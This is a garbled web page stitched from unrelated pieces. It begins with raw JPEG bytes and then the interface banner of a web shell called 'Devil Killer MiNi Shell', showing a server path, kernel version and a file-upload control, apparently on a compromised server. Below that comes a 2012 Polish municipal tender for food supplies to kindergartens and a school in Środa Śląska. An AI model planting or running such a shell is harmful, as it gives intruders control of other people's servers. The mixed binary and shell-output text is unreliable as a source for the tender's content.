JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121204/488648-N-2012.html

<p class="kh_header"><b>Środa Śląska: Dostawa żywności   Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2013r.</b><br>
<b>Numer ogłoszenia: 488648 - 2012; data zamieszczenia: 04.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Środa Śląska , Plac Wolności 5, 55-300 Środa Śląska, woj. dolnośląskie, tel. 71 3960724, faks 71 3173405.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności   Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa żywności   Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2013r. w rozbiciem na  następujące pakiety żywieniowe, i tak;
Pakiet nr 1  mięsa i wyrobów wędliniarskich oraz mięsa drobiowego,
Pakiet nr 2 mleka i przetworów mleczarskich,
Pakiet nr 3  mrożonki   owocowo, warzywne, rybne i inne przetwory owocowo - warzywne
Pakiet nr 4  artykuły sypkie i inne
Pakiet nr 5  pieczywo i wyroby cukiernicze
Pakiet nr 6  jaja.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> pakiet 1 -  2000 zł , pakiet 2 -  2000 zł , pakiet 3 - 1000 zł pakiet 4 -2500 zł , pakiet 5 - 700 zł , pakiet 6 -  200 zł ,</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz zrealizowanych oraz będących w trakcie realizacji prac w zakresie przedmiotu zamówienia w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia (wg wzoru stanowiącego załącznik  do SIWZ). wraz z referencjami z zakresu  dostaw żywności   z podaniem ich wartości oraz daty i miejsca wykonania oraz wraz załączeniem dokumentów potwierdzających, że usługi  zostały wykonane  z należyta starannością
            Zamawiający dokona oceny tego warunku  na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)oświadczenie wykonawcy o wdrożeniu systemu HACCP 
 2)  podpisany projekt umowy 
   3) formularz ofertowy wraz z wypełnionym załącznikiem na oferowany pakiet  ( formularz winien być wypełniony we wszystkich pozycjach oferowanego pakietu) 
  4) dowód wpłaty wadium</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiany zakresu przedmiotu umowy - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka
stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania
oferty,
b) zmian przewidzianych zapisami umowy lub SIWZ.
2.Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili
zawarcia umowy, pod warunkiem, że zmiana ta sprzyjać będzie optymalnemu wykonaniu zamówienia,
jak również oszczędnemu, celowemu i gospodarnemu wydatkowaniu środków finansowych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.srodaslaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pokój B-13 Urzędu Miejskiego w Środzie Ślaskiej Plac Wolności 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2012 godzina 10:00, miejsce: Pokój B-13 Urzędu Miejskiego w Środzie Ślaskiej Plac Wolności 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1  mięsa i wyrobów wędliniarskich oraz mięsa drobiowego,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1  mięsa i wyrobów wędliniarskich oraz mięsa drobiowego,
1.
Boczek wędzony parzony
kg
120
2.
Kiełbaski śląskie - paluszki
kg
180
3.
Schab bez kości
kg
1000
4.
Łopatka bez kości
kg
900
5.
Frankfurterki drobiowe
kg
120
6.
Frankfirterki wędzone
kg
90
7.
Kiłbasa śląska
kg
400
8.
Parówka drobiowa delikatesowa Morliny
kg
500
9.
Parówka cielęca
kg
100
10.
Krakowska sucha
kg
15
11.
Szynka drobiowa
kg
250
12.
Szynka wieprzowa gotowana
kg
140
13.
Polędwica drobiowa
kg
85
14.
Polędwica sopocka
kg
50
15.
Karkówka bez kości
kg
380
16.
Mięso mielone
kg
170
17
Wolowina bez kości - zrazówka
kg
220
18.
Ogonówka wędzona
kg
165
19.
Filet pieczony z indyka
kg
230
20.
Szynka zrazowa kulka (surowa)
kg
780
21.
Szunka surowa bez kości bez tłuszczu
kg
500
22.
Kiełbaski typu Pyszne
kg
20
23.
Smalec
kg
90
24.
Filet wędzony z indyka 
kg
40
25.
Kiełbasa biała cienka parzona delikates.
kg
100
26.
Schab pieczony w ziołach
kg
80
27.
Filet z kurczaka
kg
1450
28.
Porcka rosołowa z kurczaka
kg
1900
29.
Wątróbka drobiowa
kg
30
30.
Udko z kurczaka
kg
600
31.
Kurczak
kg
200
32.
Filet z indyka
kg
600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.13.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 mleka i przetworów mleczarskich,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2 mleka i przetworów mleczarskich,Mleko 1l  o zawartości tłuszczu 3,2% 
l
14 500
Masło ekstra - 82% tłuszczu
kg
1 550
Śmietana 1l - 33%
l
130
Śmietana 18% - 400 ml bez konserwantów
szt
2 000
Śmietana 12% - 400 ml bez konserwantów
zzt.
560
Ser biały tłusty krajanka pergamin
kg
1 200
Ser zółty łagodny zawartoś tłuszczu nie mnie niż 45%
kg
400
Ser topiony 100g nie gorszy niż firmy Hochland
szt.
290
Śmietana 1 l - 15% do gotowania
szt.
520
Śmietana 1 l - 24% do gotowania
szt.
100
Jogurt 150g nie gorszy niż firmy Jogoella
szt.
3 500
Serek Bakuś 100g
szt.
4 800
Serek 150g nie gorsz niż firmy Danio
szt.
5 000
Deser nie gorszy niż firmy Mikuś 4x62,5g
szt.
1 000
Deser nie gorszy niż firmy Monte 4x100g
szt.
1 300
Jogurt serduszko 150g
szt.
9 800
Jogurt 150g nie gorszy niż firmy Polskie Smaki
szt.
3 800
Jogurt Jogobella owocowa wyspa   150g
szt.
1 500
Jogurt gęsty naturalny Bakoma 400g
szt.
1 000
Jogurt biszkoptowy Danon 150g
szt.
2 400
Kefir 400ml
szt.
300
Jogurt grecki 400 ml
szt.
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3  mrożonki   owocowo, warzywne, rybne i inne przetwory owocowo - warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3  mrożonki   owocowo, warzywne, rybne i inne przetwory owocowo - warzywne
Kalafior mrożony 2,5 kg
szt.
220
Truskawki mrożone 2,5 kg
szt.
150
Barszcz ukraiński 2,5 kg
szt.
185
Ryba mrożona filet bez glazury
kg
360
Paluszki rybne z fileta - nie gorsze niż firy Frosta
kg
900
Mieszanka królewska 2,5 kg
szt.
160
Groszek 2,5 kg
szt.
60
Mieszanka szkolna 2,5 kg
szt.
20
Fasola szparagowa żółta 2,5 kg
szt.
160
Fasola szparagowa cięta 2,5 kg
szt.
140
Marchew kostka 2,5 kg
szt.
80
Jagoda 2,5 kg
szt.
10
Brokuły 2,5 kg
szt.
140
Zupa jarzynowa 2,5 kg
szt.
140
Truskawka mus 0,2 kg- nie gorszy niż firmy Nordis
szt.
200
Włoszczyzna 2,5 kg
szt.
200
Szpinak 2,5 kg (brykiet)
szt.
40
Filet z limanda (sola)
kg
900
Brukselka 2,5 kg
  szt. 
30
Koper 0,5 kg
szt.
20
Pietruszka 0,5 kg
szt.
20
Marchew z groszkiem 2,5 kg
szt.
90
Mieszanka kompotowa 2,5 kg
szt.
260
Marchew mini 2,5 kg
szt.
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.22.21.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4  artykuły sypkie i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 4 artykuły sypkie i inne 
Cukier
kg
2 400
Ciastka biszkoptowe Wrocławskie 100 kg
szt.
600
Herbata 100 torebek x 1,75 g nie gorsza niż firmy Lipton
op.
100
Dżem nie gorszy niż firmy Łowicz -280g 
szt.
500
Galaretka 800g, nie gorsza niż firmy Winiary
szt.
150
Ryż 5 kg - nie gorsz niż firmy Knorr
szt.
150
Kakao 100g, nie gorsz niż firmy Decomoreno 
szt.
70
Tuńczyk w sosie własnym 170 g
szt.
320
Konserwa filet Makrela 170 g
szt.
550
Konserwa filet Makrela 300 g
szt.
250
Ketchup łagodny 500g, nie gorszy niż firmy Pudliszki
szt.
110
Krem orzechowy 230g, nie gorszy niż firmy Nutella 
szt.
820
Chrupki kukurydziane 250g
szt.
50
Wafle chrupsy 3 kg
szt.
65
Makaron Nitka 3 kg, nie gorszy niż firmy Knorr
szt.
10
Makaron  łazanki 3 kg, nie gorszy niż firmy Knorr
szt.
20
Makaron 3-kolorowy 3 kg, nie gorszy niż firmy Knorr
szt.
90
Makaron muszelki 3 kg, nie gorsz niż firmy Knorr 
szt.
100
Makaron penette 3 kg, nie gorszy niż firmy Knorr
szt.
65
Makaron gwiazdki 3 kg, nie gorszy niż firmy Knorr
szt.
35
Makaron  świderki 3 kg, nie gorszy niż firmy Knorr
szt.
180
Makaron zacierki 250 g
szt.
160
Majeranek 0,5 kg, nie gorszy niż firmy Knorr
szt.
30
Ryż 1 kg
szt.
220
Kwasek cytrynowy 20 g
szt.
330
Poz: 1 - 25


Mąka tortowa 1 kg
kg
1 500
Mąka ziemniaczana 1 kg
kg
180
Sól
kg
420
Przyprawa 200g, nie gorsza niż firmy Kucharek
szt.
200
Pieprz mielony ziołowy 20g
szt.
580
Drożdże 100g
szt. 
90
Budyń 1 kg, nie gorszy niż firmy Winiary
szt. 
140
Tuńczyk w oleju 170 g
szt. 
50
Cukier waniliowy 32 g
szt. 
500
Papryka słodka  0,5 kg, nie gorsza niż firmy Knorr 
szt. 
10
Kleik ryżowy 170 g, nie gorszy niż firmy Bobovita
szt. 
50
Kasza manna błyskawiczna 500 g
szt. 
320
Bita śmietana w proszku, nie gorsza niż firmy Delecta
szt. 
300
Kisiel 1,3 kg, nie gorszy niż firmy Winiary
szt. 
200
Liść laurowy 6g
szt. 
130
Musztarda 1 kg łagodna
szt. 
10
Pasztet drobiowy, nie gorszy niż pasztet Prochowicki
szt. 
820
Rama do smażenia, nie gorsza niż firmy Knorr
szt. 
30
Herbata miętowa ekspresowa op. 20 x 1,75 , nie gorsza niż firmy Vitax
szt. 
130
Herbata rumiankowa ekspresowa op. 20 x 1,75 , nie gorsza niż firmy Vitax
szt. 
130
Herbata owocowa ekspresowa op. 20 x 1,75 , nie gorsza niż firmy Vitax
szt. 
150
Barszcz czerwony 1,4 kg, nie gorszy niż firmy Knorr
szt. 
20
Barszcz biały 1,3 kg, nie gorszy niż firmy Knorr
szt. 
10
Fasola sucha 1 kg
szt. 
180
Groch suchy 1 kg
szt. 
150
Kakao 200g, nie gorsze niż firmy Puchatek
szt. 
25
Majonez 400g, nie gorszy niż firmy Winiary
szt. 
120
Poz: 26 - 52



Przecier pomidorowy 0,9 kg, nie gorszy niż firmy Pudliszki
szt. 
340
Olej 1l, nie gorszy niż olej Kujawski
l
1 200
Rosołki 700g
szt. 
100
Sok wyskoko słodzony, bez konserwantów, 420 ml, nie gorszy niż firmy Herbapol
szt. 
100
Barszcz biały 3 kg, nie gorszy niż firmy Knorr
szt. 
18
Kukurydza konserwowa 400g, nie gorsza niż firmy Pudliszki
szt. 
200
Sos pieczarkowy 1,4 kg, nie gorszy niż firmy Knorr
szt. 
30
Jabłka prażone w cukrze 880g
szt. 
200
Brzoskwinie 800g
szt. 
100
Fasola czerwona 720g, nie gorsza niż firmy Pudliszki
szt. 
100
Kawa 150g, nie gorsza niż firmy Inka
szt. 
220
Płatki 250g, nie gorsze niż firmy Kangus
szt. 
370
Płatki kuleczki z midem 250g, nie gorsze niż płatki Chirios
szt. 
80
Płatki kukurydziane 250g, nie gorsze niż firmy Nestle
szt. 
370
Płatki owsiane błyskawiczne 0,5 kg
szt. 
90
Płatki ryżowe 0,5 kg
szt. 
80
Płatki jęczmienne 0,5 kg
szt. 
50
Miód prawdziwy 400g
szt. 
150
Baton w czekoladzie typu Grzesiek
szt. 
5 000
Sok czarna porzeczka 100 procent - 1l, nie gorszy niż sok Fortuna
szt. 
280
Sok Multiwitamina 100procent  - 1l, nie gorszy niż sok Fortuna
szt. 
320
Sok Karotka 100% - 1l, nie gorszy niż sok Fortuna
szt. 
380
Kasza kus-kus 400g
szt. 
130
Wafelki domowe 3-smakowe
kg
60
Herbatniki biszkoptowe nyskie 100g 
szt. 
1 000
Kasza gryczana 0,5 kg
szt. 
120
Kasza jęczmienna 0,5 kg
szt. 
590
Papryka konserwowa 800g, nie gorsza niż firmy Ptak 


szt. 
120
Poz: 53 - 80


Kapusta czerwona z jabłkiem 900 g, nie gorsz niż firmy Ptak
szt. 
280
Ogórki konserwowe 1,7 kg, nie gorsze niż firmy Rolnik
szt. 
230
Przyprawa szefa 1 kg, nie gorsza niż firmy Knorr
szt. 
100
Rosół z kury 1,2 kg, nie gorszy niż firmy Knorr
szt. 
90
Zupa krem z piecaarek 1,2 kg, nie gorsza niż firmy Knorr
szt. 
40
Zupa brokułowa 1,3 kg, nie gorsza niż firmy Knorr
szt. 
10
Nać pietruszki 150g susz
szt. 
65
Koper 250g susz
szt. 
25
Bulion grzybowy 1 kg, nie gorszy niż firmy Knorr
szt. 
15
Czosnek granulowany 0,5 kg, nie gorszy niż firmy Knorr
szt. 
20
Delika do mięs - 700g, nie gorszy niż firmy Knorr
szt. 
30
Fix do gulaszu 1,1 kg - nie gorszy niż firmy Knorr
szt. 
17
Groszek konserwowy 400 g
szt. 
180
Przyprawa w płynie 1l, nie gorsza niż firmy Knorr
szt. 
50
Rosół o smaku wędzonki 1 kg, nie gorsz niż firmy Knorr
szt. 
13
Zupa szpinakowa 1,2 kg. Nie gorsza niż firmy Knorr
szt. 
45
Zupa toskańska 1,2 kg. Nie gorsza niż firmy Knorr
szt. 
25
Sok syrop 5l Wit.C, nie gorszy niż firmy Herbapol
szt. 
60
Sosy owocowe 500 ml.
szt. 
